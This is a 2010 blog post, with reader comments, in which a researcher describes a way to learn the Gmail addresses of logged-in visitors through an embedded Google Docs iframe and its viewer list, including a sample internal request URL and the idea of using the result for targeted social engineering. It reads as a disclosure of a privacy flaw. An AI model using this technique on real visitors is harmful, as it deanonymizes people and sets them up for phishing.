?

Log in

Harvesting email addresses surreptitiously - Arvind Narayanan's journal [entries|archive|friends|userinfo]

Harvesting email addresses surreptitiously [Jan. 7th, 2010|08:42 pm]
Arvind Narayanan
[Tags|, ]

I realized there's a simple way to harvest the Gmail address of anyone who visits your web page, assuming they're logged in to Google:

Embed a world-visible iframe on your page pointing to a document on Google docs. In a separate backend process, poll the doc every few seconds (while logged in yourself) to retrive the list of people viewing it. (This list is displayed in the Google docs UI, so it has to be available; I haven't yet figured out the appropriate URL to query, which probably involves executing a bunch of Javascript.)

Have I missed anything? Is this widely known? I wonder if anyone's doing it.

Edit. I looked at a document in Firebug and the URLs are of the form
http://spreadsheets.google.com/fm/bind?hl=en&fmcmd=80&
id=tFMKXV2J2J5xVFq9dRpRrfg.12613261761483303999.1726472472965475770
&VER=6&lsq=1262925136228000&tfe=jc_78&gsessionid=eFoiXLiGEmA&RID=rpc&
SID=D50CBF4594E07F04&CI=0&AID=24&TYPE=xmlhttp&zx=w6yldwukwptv&t=1
(That link has now expired; there's a session ID in there.)

The result seems to be a JSON list that encodes all the operations that need to be performed on the front-end. I presume this behavior is part of the GWT (Google Widget Toolkit). I've verified that email addresses are sent as part of the result of that query. Now all I need to figure out is how to construct that URL given a document. A simpler alternative would be to write a browser plugin. Anyone interested in helping me demonstrate this?

There are APIs that allow you to harvest a bunch of information about a person given their email address. I think the most powerful (malicious) use of this hack would be to identify a visitor within a few seconds, and exploit the fact that social engineering attacks are much more likely to succeed if you address the person by name and/or know some details about them.
LinkReply

Comments:
From: littlelotus79
2010-01-08 05:37 pm (UTC)
You just convinced me to not stay logged on to Google. Ever!
(Reply) (Thread)
From: (Anonymous)
2010-01-08 07:13 pm (UTC)

Re: google

I only signed up to Google for the googledocs system(If Yahoo had an integrated docs system I'd never needed it) and even then I have hardly used it, and also have a Google email account, and have hardly used that either and this doesn't exactly encourage me to start using it again.
(Reply) (Thread)
From: ext_220989
2010-01-08 07:28 pm (UTC)

mistaken presumption

"I presume this behavior is part of the GWT (Google Widget Toolkit)."

I'm pretty sure you are mistaken here. Google Docs does not appear to be a GWT app, and even if it were the sort of thing you describe doesn't sound like anything i've ever seen in GWT.
(Reply) (Thread)
[User Picture]From: arvindn
2010-01-08 07:56 pm (UTC)

Re: mistaken presumption

(Reply) (Parent) (Thread)
From: (Anonymous)
2010-01-08 09:06 pm (UTC)

funny...

You cannot actually "harvest" emails this way. If you do that embedding the user visiting your page will get a warning saying that their email address is about to be grabbed, do they want to proceed.

Telling people that part isn't so exciting though, is it?
(Reply) (Thread)
[User Picture]From: arvindn
2010-01-08 09:13 pm (UTC)

Re: funny...

That made no sense at all.
(Reply) (Parent) (Thread)